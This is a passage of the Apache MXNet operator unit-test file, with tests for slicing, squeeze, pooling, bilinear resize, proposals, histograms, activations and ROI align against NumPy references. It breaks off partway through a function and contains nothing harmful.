(slice(None, None, -1), slice(None, None, -1), slice(None, None, -1)),
(slice(10, 0, -2), slice(5, 2, -1), slice(7, None, 3), slice(None, 12, 4))]
for index in index_list:
test_slice_forward_backward(arr, index)
# check numeric gradient
in_data = np.arange(36).reshape(2, 2, 3, 3)
data = mx.sym.Variable('data')
slice_sym = mx.sym.slice(data, begin=[0, None], end=[1, None], step=[2, -1])
check_numeric_gradient(slice_sym, [in_data])
def test_slice_partial_infer():
def check_slice_partial_infer(data, begin, end, step, expected_out_shape):
out = mx.sym.slice(data, begin=begin, end=end, step=step)
assert (out.infer_shape_partial()[1][0] == expected_out_shape), out.infer_shape_partial()[1]
def check_slice_axis_partial_infer(data, axis, begin, end, expected_out_shape):
out = mx.sym.slice_axis(data, axis=axis, begin=begin, end=end)
assert (out.infer_shape_partial()[1][0] == expected_out_shape), out.infer_shape_partial()[1]
var1 = mx.sym.var(name="data", shape=(0, 20))
check_slice_partial_infer(var1, (None, None), (None, 10), [], (0, 10))
check_slice_partial_infer(var1, (None, None), (None, 10), (None, 2), (0, 5))
check_slice_partial_infer(var1, (None, 3), (None, 10), [], (0, 7))
check_slice_partial_infer(var1, (None, 3), (5, 10), [], (0, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), [], (0, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), (None, 1), (0, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), (3, 3), (0, 3))
var1 = mx.sym.var(name="data", shape=(10, 0))
check_slice_axis_partial_infer(var1, 0, 0, 5, (5, 0))
check_slice_axis_partial_infer(var1, 1, 0, 5, (10, 0))
with mx.np_shape():
var1 = mx.sym.var(name="data", shape=(-1, 20))
check_slice_partial_infer(var1, (None, None), (None, 10), [], (-1, 10))
check_slice_partial_infer(var1, (None, None), (None, 10), (None, 2), (-1, 5))
check_slice_partial_infer(var1, (None, 3), (None, 10), [], (-1, 7))
check_slice_partial_infer(var1, (None, 3), (5, 10), [], (-1, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), [], (-1, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), (None, 1), (-1, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), (3, 3), (-1, 3))
var1 = mx.sym.var(name='data', shape=(10, -1))
check_slice_axis_partial_infer(var1, 0, 0, 5, (5, -1))
check_slice_axis_partial_infer(var1, 1, 0, 5, (10, -1))
def test_float16_min_max():
"""Test for issue: https://github.com/apache/incubator-mxnet/issues/9007"""
a = mx.nd.array([np.finfo('float16').min, np.finfo('float16').max], dtype='float16')
assert a.dtype == np.float16
assert np.finfo('float16').min == mx.nd.min(a).asscalar()
assert np.finfo('float16').max == mx.nd.max(a).asscalar()
@mx.use_np_shape
def test_zero_size_min_max():
def min():
a = mx.nd.zeros(shape=(5, 0))
a.min()
def max():
a = mx.nd.zeros(shape=(5, 0))
a.max()
pytest.raises(MXNetError, min)
pytest.raises(MXNetError, max)
def test_squeeze_op():
def check_squeeze_op(shape, axis=None):
data = mx.nd.random.uniform(low=-10.0, high=10.0, shape=shape)
if axis is None:
out = mx.nd.squeeze(data).asnumpy()
out_expected = np.squeeze(data.asnumpy())
else:
out = mx.nd.squeeze(data, axis=axis).asnumpy()
out_expected = np.squeeze(data.asnumpy(), axis=axis)
        if out.shape == (1,):  # exception: an all-ones shape such as (1, 1, 1, 1) is squeezed to (1,), not to a scalar
out_expected = np.squeeze(data.asnumpy(), axis=tuple([i for i in range(1, len(shape))]))
assert same(out, out_expected)
# check forward
check_squeeze_op((1, 5, 1, 3, 1), 0)
check_squeeze_op((1, 5, 1, 3, 1), 2)
check_squeeze_op((1, 5, 1, 3, 1), 4)
check_squeeze_op((1, 5, 1, 3, 1), (0, 4))
check_squeeze_op((1, 5, 1, 3, 1), (0, 2, 4))
check_squeeze_op((1, 5, 1, 3, 1))
check_squeeze_op((1, 1, 1, 1))
# check gradient
data = mx.symbol.Variable('data')
shape = (1, 2, 1, 3, 1)
data_tmp = np.ones(shape)
test = mx.sym.squeeze(data)
check_numeric_gradient(test, [data_tmp])
test = mx.sym.squeeze(data, axis=2)
check_numeric_gradient(test, [data_tmp])
test = mx.sym.squeeze(data, axis=(2, 4))
check_numeric_gradient(test, [data_tmp])
@pytest.mark.serial
def test_adaptive_avg_pool_op():
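    # NumPy reference for adaptive average pooling: output cell (oh, ow) averages
    # the input over rows [floor(oh * H_in / H_out), ceil((oh + 1) * H_in / H_out))
    # and the analogous column range, so the bin sizes adapt to the requested output size.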
def py_adaptive_avg_pool(x, height, width):
# 2D per frame adaptive avg pool
def adaptive_avg_pool_frame(x, y):
isizeH, isizeW = x.shape
osizeH, osizeW = y.shape
for oh in range(osizeH):
istartH = int(np.floor(1.0 * (oh * isizeH) / osizeH))
iendH = int(np.ceil(1.0 * (oh + 1) * isizeH / osizeH))
kH = iendH - istartH
for ow in range(osizeW):
istartW = int(np.floor(1.0 * (ow * isizeW) / osizeW))
iendW = int(np.ceil(1.0 * (ow + 1) * isizeW / osizeW))
kW = iendW - istartW
xsum = 0
for ih in range(kH):
for iw in range(kW):
xsum += x[istartH+ih][istartW+iw]
y[oh][ow] = xsum / kH / kW
B,C,_,_ = x.shape
y = np.empty([B,C,height, width], dtype=x.dtype)
for b in range(B):
for c in range(C):
adaptive_avg_pool_frame(x[b][c], y[b][c])
return y
def check_adaptive_avg_pool_op(shape, output_height, output_width=None):
x = mx.nd.random.uniform(shape=shape)
if output_width is None:
y = mx.nd.contrib.AdaptiveAvgPooling2D(x, output_size=output_height)
npy = py_adaptive_avg_pool(x.asnumpy(), output_height, output_height)
else:
y = mx.nd.contrib.AdaptiveAvgPooling2D(x, output_size=(output_height, output_width))
npy = py_adaptive_avg_pool(x.asnumpy(), output_height, output_width)
assert_almost_equal(y.asnumpy(), npy)
shape = (2, 2, 10, 10)
for i in range(1, 11):
check_adaptive_avg_pool_op(shape, i)
for j in range(1, 11):
check_adaptive_avg_pool_op(shape, i, j)
def test_bilinear_resize_op():
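    # NumPy reference for bilinear resizing: output pixel (h2, w2) maps to source
    # coordinate (h2 * (H_in - 1) / (H_out - 1), w2 * (W_in - 1) / (W_out - 1)) and
    # is a weighted average of the four surrounding input pixels.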
def py_bilinear_resize(x, outputHeight, outputWidth):
batch, channel, inputHeight, inputWidth = x.shape
if outputHeight == inputHeight and outputWidth == inputWidth:
return x
y = np.empty([batch, channel, outputHeight, outputWidth])
rheight = 1.0 * (inputHeight - 1) / (outputHeight - 1) if outputHeight > 1 else 0.0
rwidth = 1.0 * (inputWidth - 1) / (outputWidth - 1) if outputWidth > 1 else 0.0
for h2 in range(outputHeight):
h1r = 1.0 * h2 * rheight
h1 = int(np.floor(h1r))
h1lambda = h1r - h1
h1p = 1 if h1 < (inputHeight - 1) else 0
for w2 in range(outputWidth):
w1r = 1.0 * w2 * rwidth
w1 = int(np.floor(w1r))
w1lambda = w1r - w1
w1p = 1 if w1 < (inputWidth - 1) else 0
for b in range(batch):
for c in range(channel):
y[b][c][h2][w2] = (1-h1lambda)*((1-w1lambda)*x[b][c][h1][w1] + \
w1lambda*x[b][c][h1][w1+w1p]) + \
h1lambda*((1-w1lambda)*x[b][c][h1+h1p][w1] + \
w1lambda*x[b][c][h1+h1p][w1+w1p])
return y
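    # Reference backward pass: the incoming output gradients are scattered back onto
    # the four contributing input pixels with the same bilinear weights as the forward
    # pass; in 'like' mode a zero gradient is also returned for the shape-providing input.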
def py_bilinear_resize_backward(x, incoming_grads, mode='size'):
data1 = np.zeros_like(x)
data2 = incoming_grads
batchsize = data1.shape[0]
channels = data1.shape[1]
height1 = data1.shape[2]
width1 = data1.shape[3]
height2 = data2.shape[2]
width2 = data2.shape[3]
rheight = float(height1 - 1) / (height2 - 1) if (height2 > 1) else 0
rwidth = float(width1 - 1) / (width2 - 1) if (width2 > 1) else 0
# special case: just copy
if height1 == height2 and width1 == width2:
data1 += data2
return [data1]
for h2 in range(0, height2):
for w2 in range(0, width2):
h1r = rheight * h2
h1 = int(h1r)
h1p = 1 if (h1 < height1 - 1) else 0
h1lambda = h1r - h1
h0lambda = 1 - h1lambda
#
w1r = rwidth * w2
w1 = int(w1r)
w1p = 1 if (w1 < width1 - 1) else 0
w1lambda = w1r - w1
w0lambda = 1 - w1lambda
#
for n in range(0, batchsize):
for c in range(0, channels):
d2val = data2[n][c][h2][w2]
data1[n][c][h1][w1] += h0lambda * w0lambda * d2val
data1[n][c][h1][w1 + w1p] += h0lambda * w1lambda * d2val
data1[n][c][h1 + h1p][w1] += h1lambda * w0lambda * d2val
data1[n][c][h1 + h1p][w1 + w1p] += h1lambda * w1lambda * d2val
if mode == 'like':
return data1, np.zeros_like(incoming_grads)
return [data1]
def check_bilinear_resize_op(shape, height, width):
x = mx.nd.random.uniform(shape=shape)
y = mx.nd.contrib.BilinearResize2D(x, height=height, width=width)
assert_almost_equal(y, py_bilinear_resize(x.asnumpy(), height, width))
x_scale = width / shape[-1]
y_scale = height / shape[-2]
y = mx.nd.contrib.BilinearResize2D(x, scale_height=y_scale, scale_width=x_scale)
assert_almost_equal(y.asnumpy(), py_bilinear_resize(x.asnumpy(), height, width))
def check_bilinear_resize_align_corners_op():
img_shape = [1, 1, 3, 2]
data = [64, 32, 32, 64, 50, 100]
target_height = 6
target_width = 4
expected_data = {}
# align_corners = False
expected_data[0] = [
64.000, 56.000, 40.000, 32.000, 56.000, 52.000, 44.000, 40.000, 40.000, 44.000, 52.000, 56.000,
36.500, 45.625, 63.875, 73.000, 45.500, 56.875, 79.625, 91.000, 50.000, 62.500, 87.500, 100.000
]
# align_corners = True
expected_data[1] = [
64.000, 53.333, 42.667, 32.000, 51.200, 49.067, 46.933, 44.800, 38.400, 44.800, 51.200, 57.600,
35.600, 47.467, 59.333, 71.200, 42.800, 57.067, 71.333, 85.600, 50.000, 66.667, 83.333, 100.000
]
x = np.array(data, dtype=np.float32).reshape(img_shape)
x_nd = mx.nd.array(x)
y0 = np.array(expected_data[0]).reshape((1, 1, target_height, target_width))
y0_nd = mx.nd.contrib.BilinearResize2D(x_nd, height=target_height, width=target_width, mode='size', align_corners=False)
assert_almost_equal(y0, y0_nd.asnumpy(), atol=1e-3)
y1 = np.array(expected_data[1]).reshape((1, 1, target_height, target_width))
y1_nd = mx.nd.contrib.BilinearResize2D(x_nd, height=target_height, width=target_width, mode='size', align_corners=True)
assert_almost_equal(y1, y1_nd.asnumpy(), atol=1e-3)
def check_bilinear_resize_modes_op(shape, scale_height=None, scale_width=None, shape_1=None, mode=None):
x = mx.nd.random.uniform(shape=shape)
original_h = shape[2]
original_w = shape[3]
if mode == 'odd_scale':
assert scale_height is not None and scale_width is not None
new_h = int(original_h * scale_height) if (original_h % 2) == 0 else \
int((original_h - 1) * scale_height) + 1
new_w = int(original_w * scale_width) if (original_w % 2) == 0 \
else int((original_w - 1) * scale_width) + 1
y = mx.nd.contrib.BilinearResize2D(x, scale_height=scale_height,
scale_width=scale_width,
mode='odd_scale')
elif mode == 'to_even_down':
new_h = original_h if (original_h % 2) == 0 else original_h - 1
new_w = original_w if (original_w % 2) == 0 else original_w - 1
y = mx.nd.contrib.BilinearResize2D(x, mode='to_even_down')
elif mode == 'to_even_up':
new_h = original_h if (original_h % 2) == 0 else original_h + 1
new_w = original_w if (original_w % 2) == 0 else original_w + 1
y = mx.nd.contrib.BilinearResize2D(x, mode='to_even_up')
elif mode == 'to_odd_down':
new_h = original_h if (original_h % 2) == 1 else original_h - 1
new_w = original_w if (original_w % 2) == 1 else original_w - 1
y = mx.nd.contrib.BilinearResize2D(x, mode='to_odd_down')
elif mode == 'to_odd_up':
new_h = original_h if (original_h % 2) == 1 else original_h + 1
new_w = original_w if (original_w % 2) == 1 else original_w + 1
y = mx.nd.contrib.BilinearResize2D(x, mode='to_odd_up')
elif mode == 'like':
x_1 = mx.nd.random.uniform(shape=shape_1)
new_h = x_1.shape[2]
new_w = x_1.shape[3]
y = mx.nd.contrib.BilinearResize2D(x, x_1, mode='like')
new_shape_desired = np.array([shape[0], shape[1], new_h, new_w], dtype='int')
new_shape_got = np.array(y.shape, dtype='int')
data_sym = mx.sym.var('data')
data_np = x.asnumpy()
expected = py_bilinear_resize(data_np, new_h, new_w)
out_grads = np.ones([shape[0], shape[1], new_h, new_w])
expected_backward = py_bilinear_resize_backward(data_np, out_grads, mode)
assert_array_equal(new_shape_desired, new_shape_got, "Desired and got shapes are not equal. {} vs {}".format(
str(new_shape_desired.tolist()), str(new_shape_got.tolist())))
assert_almost_equal(y.asnumpy(), expected, 1e-3, 0)
if mode != 'like':
resize_sym = mx.sym.contrib.BilinearResize2D(data_sym, None, scale_height=scale_height, scale_width=scale_width, mode=mode)
check_symbolic_forward(resize_sym, [data_np], [expected], rtol=1e-3, atol=1e-5)
check_symbolic_backward(resize_sym, [data_np], [out_grads], expected_backward, rtol=1e-3, atol=1e-5)
check_numeric_gradient(resize_sym, [data_np], rtol=1e-2, atol=1e-4)
else:
data_sym_like = mx.sym.var('data_like')
resize_sym = mx.sym.contrib.BilinearResize2D(data_sym, data_sym_like, mode=mode)
date_np_like = x_1.asnumpy()
check_symbolic_forward(resize_sym, [data_np, date_np_like], [expected], rtol=1e-3, atol=1e-5)
check_symbolic_backward(resize_sym, [data_np, date_np_like], [out_grads], expected_backward, rtol=1e-3, atol=1e-5)
check_numeric_gradient(resize_sym, [data_np, date_np_like], rtol=1e-2, atol=1e-4)
shape = (2, 2, 10, 10)
check_bilinear_resize_op(shape, 5, 5)
check_bilinear_resize_op(shape, 10, 10)
check_bilinear_resize_op(shape, 15, 15)
check_bilinear_resize_op(shape, 3, 7)
check_bilinear_resize_op(shape, 13, 17)
shape = (2, 2, 20, 20)
check_bilinear_resize_modes_op(shape, scale_height=0.5, scale_width=0.5, mode='odd_scale')
check_bilinear_resize_modes_op(shape, scale_height=5, scale_width=10, mode='odd_scale')
check_bilinear_resize_modes_op(shape, scale_height=0.1, scale_width=0.2, mode='odd_scale')
check_bilinear_resize_modes_op(shape, mode='to_even_down')
check_bilinear_resize_modes_op(shape, mode='to_even_up')
check_bilinear_resize_modes_op(shape, mode='to_odd_down')
check_bilinear_resize_modes_op(shape, mode='to_odd_up')
shape = (2, 2, 21, 21)
check_bilinear_resize_modes_op(shape, scale_height=0.5, scale_width=0.5, mode='odd_scale')
check_bilinear_resize_modes_op(shape, scale_height=5, scale_width=10, mode='odd_scale')
check_bilinear_resize_modes_op(shape, scale_height=0.1, scale_width=0.2, mode='odd_scale')
check_bilinear_resize_modes_op(shape, mode='to_even_down')
check_bilinear_resize_modes_op(shape, mode='to_even_up')
check_bilinear_resize_modes_op(shape, mode='to_odd_down')
check_bilinear_resize_modes_op(shape, mode='to_odd_up')
shape_0 = (2, 2, 21, 21)
shape_1 = (2, 2, 10, 10)
check_bilinear_resize_modes_op(shape_0, shape_1=shape_1, mode='like')
check_bilinear_resize_modes_op(shape_1, shape_1=shape_0, mode='like')
check_bilinear_resize_align_corners_op()
def test_multi_proposal_op():
    # parameters
feature_stride = 16
scales = (8, 16, 32)
ratios = (0.5, 1, 2)
rpn_pre_nms_top_n = 12000
rpn_post_nms_top_n = 2000
threshold = 0.7
rpn_min_size = 16
batch_size = 20
feat_len = (1000 + 15) // 16
H, W = feat_len, feat_len
num_anchors = len(scales) * len(ratios)
count_anchors = H * W * num_anchors
'''
cls_prob: (batch_size, 2 * num_anchors, H, W)
bbox_pred: (batch_size, 4 * num_anchors, H, W)
im_info: (batch_size, 3)
'''
cls_prob = mx.nd.empty((batch_size, 2 * num_anchors, H, W), dtype = np.float32)
bbox_pred = mx.nd.empty((batch_size, 4 * num_anchors, H, W), dtype = np.float32)
im_info = mx.nd.empty((batch_size, 3), dtype = np.float32)
cls_prob = mx.nd.array(np.random.random(cls_prob.shape))
bbox_pred = mx.nd.array(np.random.random(bbox_pred.shape))
for i in range(batch_size):
im_size = np.random.randint(100, feat_len * feature_stride, size = (2,))
im_scale = np.random.randint(70, 100) / 100.0
im_info[i, :] = [im_size[0], im_size[1], im_scale]
def get_sub(arr, i):
new_shape = list(arr.shape)
new_shape[0] = 1
res = arr[i].reshape(new_shape)
return res
def check_forward(rpn_pre_nms_top_n, rpn_post_nms_top_n):
single_proposal = []
single_score = []
for i in range(batch_size):
rois, score = mx.nd.contrib.Proposal(
cls_prob = get_sub(cls_prob, i),
bbox_pred = get_sub(bbox_pred, i),
im_info = get_sub(im_info, i),
feature_stride = feature_stride,
scales = scales,
ratios = ratios,
rpn_pre_nms_top_n = rpn_pre_nms_top_n,
rpn_post_nms_top_n = rpn_post_nms_top_n,
threshold = threshold,
rpn_min_size = rpn_min_size, output_score = True)
single_proposal.append(rois)
single_score.append(score)
multi_proposal, multi_score = mx.nd.contrib.MultiProposal(
cls_prob = cls_prob,
bbox_pred = bbox_pred,
im_info = im_info,
feature_stride = feature_stride,
scales = scales,
ratios = ratios,
rpn_pre_nms_top_n = rpn_pre_nms_top_n,
rpn_post_nms_top_n = rpn_post_nms_top_n,
threshold = threshold,
rpn_min_size = rpn_min_size, output_score = True)
single_proposal = mx.nd.stack(*single_proposal).reshape(multi_proposal.shape)
single_score = mx.nd.stack(*single_score).reshape(multi_score.shape)
single_proposal_np = single_proposal.asnumpy()
multi_proposal_np = multi_proposal.asnumpy()
single_score_np = single_score.asnumpy()
multi_score_np = multi_score.asnumpy()
# check rois x1,y1,x2,y2
assert np.allclose(single_proposal_np[:, 1:], multi_proposal_np[:, 1:])
# check rois batch_idx
for i in range(batch_size):
start = i * rpn_post_nms_top_n
end = start + rpn_post_nms_top_n
assert (multi_proposal_np[start:end, 0] == i).all()
# check score
assert np.allclose(single_score_np, multi_score_np)
def check_backward(rpn_pre_nms_top_n, rpn_post_nms_top_n):
im_info_sym = mx.sym.Variable('im_info')
cls_prob_sym = mx.sym.Variable('cls_prob')
bbox_pred_sym = mx.sym.Variable('bbox_pred')
sym = mx.sym.contrib.MultiProposal(
cls_prob = cls_prob_sym,
bbox_pred = bbox_pred_sym,
im_info = im_info_sym,
feature_stride = feature_stride,
scales = scales,
ratios = ratios,
rpn_pre_nms_top_n = rpn_pre_nms_top_n,
rpn_post_nms_top_n = rpn_post_nms_top_n,
threshold = threshold,
rpn_min_size = rpn_min_size, output_score = False)
location = [cls_prob.asnumpy(), bbox_pred.asnumpy(), im_info.asnumpy()]
expected = [np.zeros_like(e) for e in location]
out_grads = [np.ones((rpn_post_nms_top_n, 5))]
check_symbolic_backward(sym, location, out_grads, expected)
check_forward(rpn_pre_nms_top_n, rpn_post_nms_top_n)
check_forward(rpn_pre_nms_top_n, 1500)
check_forward(1000, 500)
check_backward(rpn_pre_nms_top_n, rpn_post_nms_top_n)
def test_quadratic_function():
def f(x, a, b, c):
return a * x**2 + b * x + c
a = np.random.random_sample()
b = np.random.random_sample()
c = np.random.random_sample()
data = mx.symbol.Variable('data')
quad_sym = mx.sym.contrib.quadratic(data=data, a=a, b=b, c=c)
for dtype in [np.float16, np.float32, np.float64]:
tol = 1e-2 if dtype is np.float16 else 1e-5
for ndim in range(1, 6):
shape = rand_shape_nd(ndim, 5)
data_np = np.random.randn(*shape).astype(dtype)
expected = f(data_np, a, b, c)
backward_expected = 2 * a * data_np + b
# check imperative forward
output = mx.nd.contrib.quadratic(mx.nd.array(data_np), a=a, b=b, c=c)
assert_almost_equal(output, expected, rtol=tol, atol=tol)
# check forward
check_symbolic_forward(quad_sym, [data_np], [expected], rtol=tol, atol=tol)
# check backward
check_symbolic_backward(quad_sym, [data_np], [np.ones(expected.shape)],
[backward_expected], rtol=tol, atol=tol)
# check backward using finite difference
check_numeric_gradient(quad_sym, [data_np], atol=0.001)
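# Compares mx.nd.contrib.allclose against numpy.allclose on each given context,
# using randomly perturbed tolerances, and prints the offending elements whenever
# the two results disagree.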
def allclose_function(contexts):
def getRandom(base, percent = 1.):
return base * (1 + percent * (2 * np.random.random_sample() - 1.) / 100)
title = 'exp'
for ctx in contexts:
title += ' cpu' if ctx == mx.cpu() else ' gpu'
title += ' nElem shape'
num_ctx = len(contexts)
result = [False, False]
for dtype in [np.float16, np.float32, np.float64]:
rtol = getRandom(1e-2 if dtype is np.float16 else 1e-5)
atol = getRandom(1e-4 if dtype is np.float16 else 1e-7)
print('\nnumpy.{}: atol = {} rtol = {}'.format(dtype.__name__, atol, rtol))
print(title)
for ndim in range(1, 10):
shape = rand_shape_nd(ndim, 8)
a_np = np.random.randn(*shape).astype(dtype)
b_np = (a_np + np.random.randn(*shape).astype(dtype) / 10000000).astype(dtype)
expected = np.allclose(a_np, b_np, rtol, atol)
for n, ctx in enumerate(contexts):
a_ctx = mx.nd.array(a_np, dtype = dtype, ctx=ctx)
b_ctx = mx.nd.array(b_np, dtype = dtype, ctx=ctx)
output = mx.nd.contrib.allclose(a_ctx, b_ctx, rtol=rtol, atol=atol)
result[n] = output.asnumpy() == 1
if expected != result[n]:
                    # Report the elements that this context flags as "not close", together with the
                    # corresponding elements on the comparison (CPU/GPU/Python) side that flags them as "close"
v_ctx = 'CPU' if ctx == mx.cpu() else 'GPU'
if expected:
v_cmp = 'Python'
a_b = a_ctx.asnumpy()
b_b = b_ctx.asnumpy()
a_g = np.asarray(a_np)
b_g = np.asarray(b_np)
else:
v_cmp = v_ctx
v_ctx = 'Python'
a_b = np.asarray(a_np)
b_b = np.asarray(b_np)
a_g = a_ctx.asnumpy()
b_g = b_ctx.asnumpy()
print('\n *** Violations found on %s, but not on %s side ***' % (v_ctx, v_cmp))
frmt = " a[{0:d}]: b[{0:d}]:" \
" abs(a[{0:d}]-b[{0:d}]) - atol + rtol*abs(b[{0:d}]):"
# Define the indices of all violations and corresponding values of coordinates
bad_indexes = np.abs(a_b - b_b) >= atol + rtol * abs(b_b)
a_values = [a_b[bad_indexes], a_g[bad_indexes]]
b_values = [b_b[bad_indexes], b_g[bad_indexes]]
idx = np.asarray(np.where(bad_indexes == True))
idx = idx.reshape(1, idx.size)
idx_flat = np.asarray(np.where(bad_indexes.flatten() == True)).flatten()
for i in range(len(a_values[0])):
flat_idx = idx_flat[i]
print('{}: index = {} flat_index = {}'.format('%4d'%i, idx[i], flat_idx))
print(frmt.format(flat_idx))
for j in range(2):
diff = np.abs(a_values[j][i]-b_values[j][i]) - atol + rtol*abs(b_values[j][i])
print('{}: {} {} {}'.format('%6s'%v_ctx, a_values[j][i], b_values[j][i], diff))
if num_ctx == 1:
print(' {0:d} {1:d} {2:10d} {3:}'.format(expected, result[0], np.prod(shape), shape))
else:
print(' {0:d} {1:d} {2:d} {3:10d} {4:}'.format(expected, result[0], result[1], np.prod(shape), shape))
if expected != result[0] or num_ctx > 1 and expected != result[1]:
assert False
@pytest.mark.serial
def test_allclose_function():
allclose_function([default_device()])
def test_histogram():
def f(x, bins=10, range=None):
return np.histogram(x, bins, range=range)
for ndim in range(1, 6):
shape = rand_shape_nd(ndim)
x = rand_ndarray(shape, stype='default', dtype=np.float64)
mx_bins = mx.nd.array([-1.0, 0.5, 2.0, 4.5, 50.0], dtype=np.float64)
np_bins = mx_bins.asnumpy()
bin_cnt = random.randint(2, 10)
bin_range = (-2.5, 2.5)
mx_histo1, mx_bins1 = mx.nd.histogram(x, bins=bin_cnt, range=bin_range)
np_histo1, np_bins1 = f(x.asnumpy(), bins=bin_cnt, range=bin_range)
assert_almost_equal(mx_bins1, np_bins1)
assert_almost_equal(mx_histo1, np_histo1, rtol=1e-3, atol=1e-5)
mx_histo2, mx_bins2 = mx.nd.histogram(x, bins=mx_bins)
np_histo2, np_bins2 = f(x.asnumpy(), bins=np_bins)
assert_almost_equal(mx_histo2, np_histo2, rtol=1e-3, atol=1e-5)
assert_almost_equal(mx_bins2, np_bins2, rtol=1e-3, atol=1e-5)
data = mx.sym.Variable("data")
bins = mx.sym.Variable("bins")
histo1 = mx.sym.histogram(a=data, bins=bin_cnt, range=bin_range)
histo2 = mx.sym.histogram(a=data, bins=bins)
executor1 = histo1._bind(ctx=default_device(), args={"data" : x})
executor1.forward(is_train=False)
assert_almost_equal(np_histo1, executor1.outputs[0].asnumpy(), 0, 0, ("EXPECTED_histo1", "FORWARD_histo1"), equal_nan=False)
executor2 = histo2._bind(ctx=default_device(), args={"data" : x, "bins" : mx_bins})
executor2.forward(is_train=False)
assert_almost_equal(np_histo2, executor2.outputs[0].asnumpy(), 0, 0, ("EXPECTED_histo2", "FORWARD_histo2"), equal_nan=False)
@pytest.mark.skip(reason="test fails intermittently. temporarily disabled till it gets fixed. tracked at https://github.com/apache/incubator-mxnet/issues/13915")
def test_activation():
shapes = [(9,), (9, 10), (9, 10, 10), (1, 9, 10, 10)]
dtype_l = [np.float64, np.float32, np.float16]
rtol_l = [1e-7, 1e-6, 1e-2]
atol_l = [1e-7, 1e-6, 1e-2]
rtol_fd = 1e-5
atol_fd = 1e-6
num_eps = 1e-6
unary_ops = {
'relu': [lambda x: mx.sym.Activation(x, act_type='relu'),
lambda x: np.maximum(x, 0.),
lambda x: 1. * (x > 0.),
-5.0, 5.0],
'sigmoid': [lambda x: mx.sym.Activation(x, act_type='sigmoid'),
lambda x: 1. / (np.exp(-x) + 1.),
lambda x: 1. / (np.exp(-x) + 1.) / (np.exp(x) + 1.),
-3.0, 3.0],
'tanh': [lambda x: mx.sym.Activation(x, act_type='tanh'),
lambda x: np.tanh(x),
lambda x: 1. - np.tanh(x) ** 2,
-4.0, 4.0],
'softrelu': [lambda x: mx.sym.Activation(x, act_type='softrelu'),
lambda x: np.log(1. + np.exp(x)),
lambda x: 1. - 1 / (1 + np.exp(x)),
-3.0, 3.0],
'softsign': [lambda x: mx.sym.Activation(x, act_type='softsign'),
lambda x: x / (1. + np.abs(x)),
lambda x: 1. / np.square(1. + np.abs(x)),
-3.0, 3.0],
}
# Loop over operators
for name, op in unary_ops.items():
# Loop over shapes
for shape in shapes:
# Loop over dtype's
for ind in range(len(dtype_l)):
dtype = dtype_l[ind]
rtol = rtol_l[ind]
atol = atol_l[ind]
compare_forw_backw_unary_op(
name, op[0], op[1], op[2], shape, op[3], op[4], rtol, atol,
dtype)
# Finite difference testing
finite_diff_unary_op(
name, op[0], shape, op[3], op[4], rtol_fd, atol_fd, num_eps)
@pytest.mark.serial
def test_ravel():
# be aware that check_symbolic_forward will use float type internally
# for the arrays and that limits the representable flat index range.
# Taking dim==4 and a range of [0,..,100] for the data can already
# cause precision issues and break this test.
for dim in [1, 2, 3, 4]:
data = np.random.randint(50, size=(dim, 500))
shape = tuple(np.add(np.amax(data, axis=1), [1]))
a = mx.sym.Variable('a')
ravel_npy = np.ravel_multi_index(data, shape)
b = mx.sym.ravel_multi_index(a, shape=shape)
check_symbolic_forward(b, location={'a': data}, expected=[ravel_npy])
c = mx.sym.unravel_index(a, shape=shape)
check_symbolic_forward(c, location={'a': ravel_npy}, expected=[data])
# Test with leading dimension set to -1.
shape2 = shape
shape2 = (-1,)+shape[1:]
b = mx.sym.ravel_multi_index(a, shape=shape2)
check_symbolic_forward(b, location={'a': data}, expected=[ravel_npy])
c = mx.sym.unravel_index(a, shape=shape2)
check_symbolic_forward(c, location={'a': ravel_npy}, expected=[data])
def test_unravel_index():
unravel_shape = (2, 10)
unravel_size = np.prod(unravel_shape)
for shape in [(10,), (2, 10), (3, 4, 5)]:
a = np.random.randint(0, unravel_size, size=shape)
b = np.stack(np.unravel_index(a, shape=unravel_shape), 0)
a_mx = mx.nd.array(a)
b_mx = mx.nd.unravel_index(a_mx, shape=unravel_shape)
assert_array_equal(b, b_mx.asnumpy())
def test_device_num_gpus():
try:
        # Note: the test runs on both GPU and CPU hosts, so we cannot assert
        # a specific number here.
assert mx.device.num_gpus() >= 0
except mx.MXNetError as e:
        # Note: on a CPU-only host, CUDA sometimes cannot determine the number
        # of GPUs
if str(e).find("CUDA") == -1:
raise e
def test_context_backward_compatibility():
try:
        # Note: the test runs on both GPU and CPU hosts, so we cannot assert
        # a specific number here.
assert mx.context.num_gpus() >= 0
except mx.MXNetError as e:
        # Note: on a CPU-only host, CUDA sometimes cannot determine the number
        # of GPUs
if str(e).find("CUDA") == -1:
raise e
if mx.context.num_gpus() > 0:
test_input = mx.np.ones((1,), ctx=mx.context.gpu())
assert test_input.ctx == test_input.context
context = test_input.ctx
(free_mem_bytes, total_mem_bytes) = mx.context.gpu_memory_info(context.device_id)
test_input_cpu = test_input.as_in_ctx(mx.context.cpu())
test_input_gpu = test_input_cpu.as_in_context(mx.context.gpu())
assert context == test_input_gpu.context
@pytest.mark.serial
def test_op_roi_align():
T = np.float32
def assert_same_dtype(dtype_a, dtype_b):
'''
Assert that the two data types are the same
Parameters
----------
dtype_a, dtype_b: type
Input data types to compare
'''
assert dtype_a == dtype_b,\
TypeError('Unmatched data types: %s vs %s' % (dtype_a, dtype_b))
def bilinear_interpolate(bottom, height, width, y, x):
if y < -1.0 or y > height or x < -1.0 or x > width:
return T(0.0), []
x = T(max(0.0, x))
y = T(max(0.0, y))
x_low = int(x)
y_low = int(y)
if x_low >= width - 1:
x_low = x_high = width - 1
x = T(x_low)
else:
x_high = x_low + 1
if y_low >= height - 1:
y_low = y_high = height - 1
y = T(y_low)
else:
y_high = y_low + 1
ly = y - T(y_low)
lx = x - T(x_low)
hy = T(1.0) - ly
hx = T(1.0) - lx
v1 = bottom[y_low, x_low]
v2 = bottom[y_low, x_high]
v3 = bottom[y_high, x_low]
v4 = bottom[y_high, x_high]
w1 = hy * hx
w2 = hy * lx
w3 = ly * hx
w4 = ly * lx
assert_same_dtype(w1.dtype, T)
assert_same_dtype(w2.dtype, T)
assert_same_dtype(w3.dtype, T)
assert_same_dtype(w4.dtype, T)
val = w1 * v1 + w2 * v2 + w3 * v3 + w4 * v4
assert_same_dtype(val.dtype, T)
grad = [(y_low, x_low, w1), (y_low, x_high, w2),
